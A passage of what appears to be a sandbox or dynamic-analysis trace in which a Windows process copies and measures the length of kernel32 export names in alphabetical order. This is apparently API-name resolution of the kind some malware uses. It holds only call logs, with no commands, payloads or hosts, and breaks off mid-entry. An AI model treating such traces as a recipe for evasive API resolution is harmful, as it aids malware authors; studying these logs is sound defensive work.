(lpString="AREFILEAPISANSI") returned 15 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0180.760] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0180.760] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0180.760] lstrlenA (lpString="BACKUPREAD") returned 10 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0180.760] lstrlenA (lpString="BACKUPSEEK") returned 10 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0180.760] lstrlenA (lpString="BACKUPWRITE") returned 11 [0180.760] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0180.760] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0180.761] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0180.761] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0180.761] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0180.761] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0180.761] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0180.761] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0180.761] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0180.761] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0180.761] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0180.761] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0180.761] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0180.761] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0180.761] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0180.761] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0180.761] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0180.761] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0180.761] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0180.761] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0180.761] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0180.761] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0180.762] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0180.762] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0180.762] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0180.762] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0180.762] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0180.762] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0180.762] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0180.762] lstrlenA (lpString="BEEP") returned 4 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0180.762] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0180.762] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0180.762] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0180.762] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0180.762] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0180.762] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0180.762] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0180.762] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0180.762] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0180.762] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0180.762] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0180.762] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0180.763] lstrlenA (lpString="CANCELIO") returned 8 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0180.763] lstrlenA (lpString="CANCELIOEX") returned 10 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0180.763] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0180.763] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0180.763] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0180.763] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0180.763] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0180.763] lstrlenA (lpString="CHECKELEVATION") returned 14 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0180.763] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0180.763] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0180.763] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0180.763] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0180.763] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0180.763] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0180.763] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0180.763] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0180.763] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0180.763] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0180.763] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0180.763] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0180.764] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0180.764] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0180.764] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0180.764] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0180.764] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0180.764] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0180.764] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0180.764] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0180.764] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0180.764] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0180.764] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0180.764] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0180.764] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0180.764] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0180.764] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0180.764] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0180.764] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0180.764] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0180.764] lstrcpyA (in: lpString1=0x36fce30, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0180.764] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0180.765] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0180.765] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0180.765] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0180.765] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0180.765] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0180.765] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0180.765] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0180.765] lstrlenA (lpString="COPYCONTEXT") returned 11 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0180.765] lstrlenA (lpString="COPYFILEA") returned 9 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0180.765] lstrlenA (lpString="COPYFILEEXA") returned 11 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0180.765] lstrlenA (lpString="COPYFILEEXW") returned 11 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0180.765] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0180.765] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0180.765] lstrlenA (lpString="COPYFILEW") returned 9 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0180.765] lstrlenA (lpString="COPYLZFILE") returned 10 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0180.765] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0180.765] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0180.765] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0180.765] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0180.766] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0180.766] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0180.766] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0180.766] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0180.766] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0180.766] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0180.766] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0180.766] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0180.766] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0180.766] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0180.766] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0180.766] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0180.766] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0180.766] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0180.766] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0180.766] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0180.766] lstrlenA (lpString="CREATEEVENTA") returned 12 [0180.766] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0180.766] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0180.766] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0180.767] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0180.767] lstrlenA (lpString="CREATEEVENTW") returned 12 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0180.767] lstrlenA (lpString="CREATEFIBER") returned 11 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0180.767] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0180.767] lstrlenA (lpString="CREATEFILEA") returned 11 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0180.767] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0180.767] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0180.767] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0180.767] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0180.767] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0180.767] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0180.767] lstrlenA (lpString="CREATEFILEW") returned 11 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0180.767] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0180.767] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0180.767] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0180.767] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0180.767] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0180.767] lstrlenA 